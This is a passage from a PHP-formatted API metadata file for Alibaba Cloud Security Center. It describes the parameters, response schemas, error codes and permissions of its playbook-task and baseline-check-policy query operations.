'integer', 'format' => 'int64', 'required' => false, 'example' => '100', 'title' => ''], ], [ 'name' => 'Condition', 'in' => 'query', 'schema' => ['description' => 'The condition parameter for task scheduling.', 'type' => 'string', 'required' => false, 'example' => '{"status":1}', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1683940A-E4AE-4473-8C40-F4075434****'], 'Records' => [ 'description' => 'The execution records.', 'type' => 'array', 'items' => ['description' => 'The execution record details.', 'type' => 'string', 'example' => '{"id":1,"playbookId":"123"}', 'title' => ''], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'PageSize' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'PageNumber' => ['description' => 'The page number of the current page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query policy task execution results', 'summary' => 'Queries the execution results of a policy task in the task center.', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API call. Other editions are not supported.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTaskResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarStrategyTaskResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1683940A-E4AE-4473-8C40-F4075434****\\",\\n \\"Records\\": [\\n \\"{\\\\\\"id\\\\\\":1,\\\\\\"playbookId\\\\\\":\\\\\\"123\\\\\\"}\\"\\n ],\\n \\"PageInfo\\": {\\n \\"PageSize\\": 20,\\n \\"PageNumber\\": 1,\\n \\"TotalCount\\": 1\\n }\\n}","type":"json"}]', ], 'DescribeSoarStrategyTasks' => [ 'summary' => 'Queries a list of policy tasks on the Playbook page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92202', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'PageNumber', 'in' => 'query', 'schema' => ['description' => 'The page number. Pages start from page 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'PageNumber' => ['description' => 'The page number. Pages start from page 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'SoarStrategyTasks' => [ 'description' => 'The policy tasks.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the policy task.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the policy task. Valid values:'."\n" ."\n" .'* \\-1: waiting'."\n" .'* 0: starting'."\n" .'* 1: running'."\n" .'* 2: finished'."\n" .'* 3: schedule'."\n" .'* 4: pause'."\n", 'type' => 'string', 'example' => '0', 'title' => ''], 'FailedNum' => ['description' => 'The number of execution failures.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'StrategyId' => ['description' => 'The ID of the policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '8000', 'title' => ''], 'GmtCreate' => ['description' => 'The timestamp when the policy task was created. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1708481235000', 'title' => ''], 'SuccessNum' => ['description' => 'The number of successful executions.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalNum' => ['description' => 'The total number of executions.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RunMode' => ['description' => 'The execution mode. Valid values:'."\n" ."\n" .'* runmode_TRIGGER_BY_USER: manually executed'."\n", 'type' => 'string', 'example' => 'runmode_TRIGGER_BY_USER', 'title' => ''], 'Name' => ['description' => 'The name of the policy task.'."\n", 'type' => 'string', 'example' => 'strategy_name01', 'title' => ''], 'GmtModified' => ['description' => 'The timestamp when the policy task was modified. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1669869436000', 'title' => ''], 'Id' => ['description' => 'The ID of the policy task.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '5374', 'title' => ''], 'GmtFinish' => ['description' => 'The timestamp when the policy task was complete. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1586739841000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"PageSize\\": 20,\\n \\"PageNumber\\": 1,\\n \\"TotalCount\\": 100,\\n \\"SoarStrategyTasks\\": [\\n {\\n \\"Status\\": \\"0\\",\\n \\"FailedNum\\": 20,\\n \\"StrategyId\\": 8000,\\n \\"GmtCreate\\": 1708481235000,\\n \\"SuccessNum\\": 20,\\n \\"TotalNum\\": 20,\\n \\"RunMode\\": \\"runmode_TRIGGER_BY_USER\\",\\n \\"Name\\": \\"strategy_name01\\",\\n \\"GmtModified\\": 1669869436000,\\n \\"Id\\": 5374,\\n \\"GmtFinish\\": 1586739841000\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSoarStrategyTasks', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTasks'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarStrategyTasks', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSoarSubscribedStrategy' => [ 'summary' => 'Queries the list of custom policies created in the task center of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92203', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'PageNumber', 'in' => 'query', 'schema' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'PageNumber' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '101', 'title' => ''], 'SoarStrategies' => [ 'description' => 'The list of policies.', 'type' => 'array', 'items' => [ 'description' => 'The policy details.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The policy type. Valid values:'."\n" .'- type_vulfix: vulnerability management.', 'type' => 'string', 'example' => 'type_vulfix', 'title' => ''], 'ExecuteNum' => ['description' => 'The total number of times the policy has been executed.', 'type' => 'string', 'example' => '10', 'title' => ''], 'Description' => ['description' => 'The policy description.', 'type' => 'string', 'example' => 'strategy_description_01', 'title' => ''], 'GmtCreate' => ['description' => 'The timestamp when the policy was created, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1716344106000', 'title' => ''], 'RunMode' => ['description' => 'The execution mode. Valid values:'."\n" .'- runmode_TRIGGER_BY_USER: manual execution.', 'type' => 'string', 'example' => 'runmode_TRIGGER_BY_USER', 'title' => ''], 'Name' => ['description' => 'The policy name.', 'type' => 'string', 'example' => 'strategy_name01', 'title' => ''], 'GmtModified' => ['description' => 'The timestamp when the policy was last modified, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1652672104000', 'title' => ''], 'Id' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '300063', 'title' => ''], 'Creator' => ['description' => 'The Alibaba Cloud account ID of the creator.', 'type' => 'string', 'example' => '1276085*****4392', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query custom policies in the task center', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API operation. Other editions do not support this operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarSubscribedStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSoarSubscribedStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"PageSize\\": 20,\\n \\"PageNumber\\": 1,\\n \\"TotalCount\\": 101,\\n \\"SoarStrategies\\": [\\n {\\n \\"Type\\": \\"type_vulfix\\",\\n \\"ExecuteNum\\": \\"10\\",\\n \\"Description\\": \\"strategy_description_01\\",\\n \\"GmtCreate\\": 1716344106000,\\n \\"RunMode\\": \\"runmode_TRIGGER_BY_USER\\",\\n \\"Name\\": \\"strategy_name01\\",\\n \\"GmtModified\\": 1652672104000,\\n \\"Id\\": 300063,\\n \\"Creator\\": \\"1276085*****4392\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeStrategy' => [ 'summary' => 'Queries the details about baseline check policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92204', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.X.X', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy that you want to query. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '8164248', 'title' => ''], ], [ 'name' => 'CustomType', 'in' => 'query', 'schema' => ['description' => 'The type of the baseline check policy that you want to query. Valid values:'."\n" ."\n" .'* **common**: standard baseline check policy'."\n" .'* **custom**: custom baseline check policy'."\n", 'type' => 'string', 'required' => false, 'example' => 'custom', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '75C127E6-76CD-59A7-B6E4-1CBBDC98F2EB', 'title' => ''], 'Strategies' => [ 'description' => 'The details of the baseline check policies.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the baseline check policy.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The source type of the baseline check policy. Valid values:'."\n" ."\n" .'* **1**: indicates a built-in policy provided and performed by Security Center by default.'."\n" .'* **2**: indicates a user-defined policy. It can be a standard or custom baseline check policy.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'ExecStatus' => ['description' => 'The status of the baseline check policy. Valid values:'."\n" ."\n" .'* **1**: not executed'."\n" .'* **2**: executing'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PassRate' => ['description' => 'The proportion of risky baselines in the baseline check result.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CycleStartTime' => ['description' => 'The time when the baseline check starts. Valid values:'."\n" ."\n" .'* **0**: The baseline check starts within the time range from 00:00 to 06:00.'."\n" .'* **6**: The baseline check starts within the time range from 06:00 to 12:00.'."\n" .'* **12**: The baseline check starts within the time range from 12:00 to 18:00.'."\n" .'* **18**: The baseline check starts within the time range from 18:00 to 24:00.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CustomType' => ['description' => 'The type of the baseline check policy. Valid values:'."\n" ."\n" .'* **common**'."\n" .'* **custom**'."\n", 'type' => 'string', 'example' => 'custom', 'title' => ''], 'EcsCount' => ['description' => 'The number of the assets to which the baseline check policy is applied.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '50', 'title' => ''], 'ProcessRate' => ['description' => 'The number of the assets on which the baseline check is complete.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'CycleDays' => ['description' => 'The cycle of the baseline check. Valid values:'."\n" ."\n" .'* **1**: every 2 days'."\n" .'* **3**: every 4 days'."\n" .'* **7**: every 8 days'."\n" .'* 30: every 31 days'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskCount' => ['description' => 'The number of baseline check items in the baseline check policy.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'Name' => ['description' => 'The name of the baseline check policy.'."\n", 'type' => 'string', 'example' => 'text2', 'title' => ''], 'Id' => ['description' => 'The ID of the baseline check policy.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '8164248', 'title' => ''], 'ConfigTargets' => [ 'description' => 'The details of the assets to which the baseline check policy is applied.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The asset to which the baseline check policy is applied.'."\n", 'type' => 'object', 'properties' => [ 'Flag' => ['description' => 'Indicates whether the baseline check policy is applied to the asset group. Valid values:'."\n" ."\n" .'* **add**: The baseline check policy is applied to the asset group.'."\n" .'* **del**: the baseline check policy is not applied to the asset group.'."\n", 'type' => 'string', 'example' => 'add', 'title' => ''], 'Target' => ['description' => 'The asset group ID or UUID of the asset to which the baseline check policy is applied.'."\n", 'type' => 'string', 'example' => '10099713', 'title' => ''], 'TargetType' => ['description' => 'The condition by which the baseline check policy is applied to the asset. Valid values:'."\n" ."\n" .'* **groupId**: the ID of the asset group'."\n" .'* **uuid**: the UUID of the asset'."\n", 'type' => 'string', 'example' => 'groupId', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'StartTime' => ['description' => 'The start time of the baseline check policy.'."\n", 'type' => 'string', 'example' => '00:00:00', 'title' => ''], 'EndTime' => ['description' => 'The end time of the baseline check policy.'."\n", 'type' => 'string', 'example' => '03:00:00', 'title' => ''], 'Percent' => ['description' => 'The progress of the baseline check by using the baseline. This parameter is returned only if the value of the ExecStatus parameter is 2.'."\n", 'type' => 'string', 'example' => '50%', 'title' => ''], 'UserModifyTime' => ['description' => 'The time when the baseline check policy was last modified.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2025-01-07 10:46:43', 'title' => ''], 'ExecutionType' => ['description' => 'The triggering method of baseline scanning. Value:'."\n" ."\n" .'- **Schedule** : Periodic configuration of task triggers'."\n" ."\n" .'- **Manual** : Manually triggered', 'type' => 'string', 'example' => 'Manual', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"75C127E6-76CD-59A7-B6E4-1CBBDC98F2EB\\",\\n \\"Strategies\\": [\\n {\\n \\"Type\\": 2,\\n \\"ExecStatus\\": 1,\\n \\"PassRate\\": 0,\\n \\"CycleStartTime\\": 0,\\n \\"CustomType\\": \\"custom\\",\\n \\"EcsCount\\": 50,\\n \\"ProcessRate\\": 20,\\n \\"CycleDays\\": 1,\\n \\"RiskCount\\": 23,\\n \\"Name\\": \\"text2\\",\\n \\"Id\\": 8164248,\\n \\"ConfigTargets\\": [\\n {\\n \\"Flag\\": \\"add\\",\\n \\"Target\\": \\"10099713\\",\\n \\"TargetType\\": \\"groupId\\"\\n }\\n ],\\n \\"StartTime\\": \\"00:00:00\\",\\n \\"EndTime\\": \\"03:00:00\\",\\n \\"Percent\\": \\"50%\\",\\n \\"UserModifyTime\\": 0,\\n \\"ExecutionType\\": \\"Manual\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 75C127E6-76CD-59A7-B6E4-1CBBDC98F2EB\\n \\n 2\\n 1\\n 0\\n 0\\n custom\\n 50\\n 20\\n 1\\n 23\\n text2\\n 8164248\\n \\n add\\n 10099713\\n groupId\\n \\n \\n","errorExample":""}]', 'title' => 'DescribeStrategy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeStrategy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BaselineStrategy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:baselinestrategy/*'], ], ], ], ], ], 'DescribeStrategyDetail' => [ 'summary' => 'Retrieves the details of a baseline check policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.', 'type' => 'string', 'required' => true, 'example' => '123456', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response data for the baseline check policy details.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C5B28F65-9245-5DC1-B3CF-5F2756A756A8', 'title' => ''], 'Strategy' => [ 'description' => 'The information about the policy.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the policy. Valid values:'."\n" ."\n" .'- **1**: system-added policy. The policy name is the default policy.'."\n" .'- **2**: user-added policy.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CycleDays' => ['description' => 'The detection cycle of the policy.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Name' => ['description' => 'The Policy Name.', 'type' => 'string', 'example' => 'TestStrategy', 'title' => ''], 'Id' => ['description' => 'The ID of the policy.', 'type' => 'integer', 'format' => 'int32', 'example' => '123', 'title' => ''], 'CycleStartTime' => ['description' => 'The detection cycle of the policy. Valid values:'."\n" ."\n" .'- **0**: 00:00 to 06:00'."\n" .'- **6**: 06:00 to 12:00'."\n" .'- **12**: 12:00 to 18:00'."\n" .'- **18**: 18:00 to 24:00.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RiskTypeWhiteListQueryResultList' => [ 'description' => 'The list of risk item whitelists.', 'type' => 'array', 'items' => [ 'description' => 'The risk item whitelist.', 'type' => 'object', 'properties' => [ 'TypeName' => ['description' => 'The check item.', 'type' => 'string', 'example' => 'hc_exploit', 'title' => ''], 'Alias' => ['description' => 'The alias of the check item.', 'type' => 'string', 'example' => 'Unauthorized Access', 'title' => ''], 'On' => ['description' => 'Indicates whether the risk item is selected. Valid values:'."\n" ."\n" .'- **true**: Selected.'."\n" .'- **false**: Not selected.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'SubTypes' => [ 'description' => 'The list of sub-risk items.', 'type' => 'array', 'items' => [ 'description' => 'The sub-risk item.', 'type' => 'object', 'properties' => [ 'TypeName' => ['description' => 'The type name of the sub-check item.', 'type' => 'string', 'example' => 'hc_exploit_redis', 'title' => ''], 'Alias' => ['description' => 'The alias of the check item.', 'type' => 'string', 'example' => 'Redis unauthorized access high exploit vulnerability risk', 'title' => ''], 'On' => ['description' => 'Indicates whether the sub-risk item is selected. Valid values:'."\n" ."\n" .'- **true**: Selected.'."\n" .'- **false**: Not selected.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'CheckDetails' => [ 'description' => 'The list of custom check item details.', 'type' => 'array', 'items' => [ 'description' => 'The custom check item details.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '206', 'title' => ''], 'CheckItem' => ['description' => 'The check item.', 'type' => 'string', 'example' => 'Ensure password expiration period is set.', 'title' => ''], 'CheckDesc' => ['description' => 'The description of the check item.', 'type' => 'string', 'example' => 'Set password expiration time, force regular modification of password, reduce password leakage and guess risk.Use non-password login (e.g. key pair) please ignore this item.', 'title' => ''], 'Rules' => [ 'description' => 'The list of rule information.', 'type' => 'array', 'items' => [ 'description' => 'The rule information.', 'type' => 'object', 'properties' => [ 'Optional' => ['description' => 'Indicates whether the rule is optional. Valid values:'."\n" ."\n" .'- **1**: Optional.'."\n" .'- **0**: Not optional.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RuleDesc' => ['description' => 'The description of the rule.', 'type' => 'string', 'example' => 'Please customize the password expiration time detection standard as', 'title' => ''], 'DefaultValue' => ['description' => 'The default value of the rule.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RuleId' => ['description' => 'The ID of the rule.', 'type' => 'string', 'example' => 'login_unlock_deny_pam_faillock.must.cus', 'title' => ''], 'ParamList' => [ 'description' => 'The list of rule parameters.', 'type' => 'array', 'items' => [ 'description' => 'The rule parameter information.', 'type' => 'object', 'properties' => [ 'ParamDefaultValue' => ['description' => 'The default value of the rule parameter.', 'type' => 'string', 'example' => '7', 'title' => ''], 'Value' => ['description' => 'The configured value of the rule parameter.', 'type' => 'string', 'example' => '7', 'title' => ''], 'ParamName' => ['description' => 'The name of the rule parameter.', 'type' => 'string', 'example' => 'range_val', 'title' => ''], 'MaxValue' => ['description' => 'The maximum value of the rule parameter.', 'type' => 'integer', 'format' => 'int32', 'example' => '999', 'title' => ''], 'ParamType' => ['description' => 'The type of the rule parameter. Valid values:'."\n" ."\n" .'- **1**: input'."\n" .'- **2**: selection.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ParamDesc' => ['description' => 'The description of the rule parameter.', 'type' => 'string', 'example' => 'The setting value is 0 means no definition, 1 means success, 2 means failure, 3 means success and failure', 'title' => ''], 'MinValue' => ['description' => 'The minimum value of the rule parameter.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'EnumValue' => ['description' => 'The options for the rule parameter when the parameter type is selection.', 'type' => 'string', 'example' => '0,1,2,3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'SupportedOs' => ['description' => 'The supported operating system. Valid values:'."\n" ."\n" .'- **windows**'."\n" .'- **linux**.', 'type' => 'string', 'example' => 'windows', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'StartTime' => ['description' => 'The start time of the baseline check policy.', 'type' => 'string', 'example' => '02:00:00', 'title' => ''], 'EndTime' => ['description' => 'The end time of the baseline check policy execution.', 'type' => 'string', 'example' => '03:00:00', 'title' => ''], 'CustomType' => ['description' => 'The type of the policy. Valid values:'."\n" ."\n" .'- **common**: Standard policy.'."\n" .'- **custom**: Custom policy.', 'type' => 'string', 'example' => 'common', 'title' => ''], 'TargetType' => ['description' => 'The method used to add assets to the policy. Valid values:'."\n" ."\n" .'- **groupId**: Assets are added by asset group.'."\n" .'- **uuid**: Assets are added individually.', 'type' => 'string', 'example' => 'groupId', 'title' => ''], 'RiskSubTypeName' => ['description' => 'The subtype of the baseline check item.', 'type' => 'string', 'example' => 'hc_nginx_linux,tomcat7,hc_mysql_ali,hc_docker', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve baseline check policy details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategyDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeStrategyDetail', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BaselineStrategy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:baselinestrategy/{#BaselineStrategyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C5B28F65-9245-5DC1-B3CF-5F2756A756A8\\",\\n \\"Strategy\\": {\\n \\"Type\\": 1,\\n \\"CycleDays\\": 3,\\n 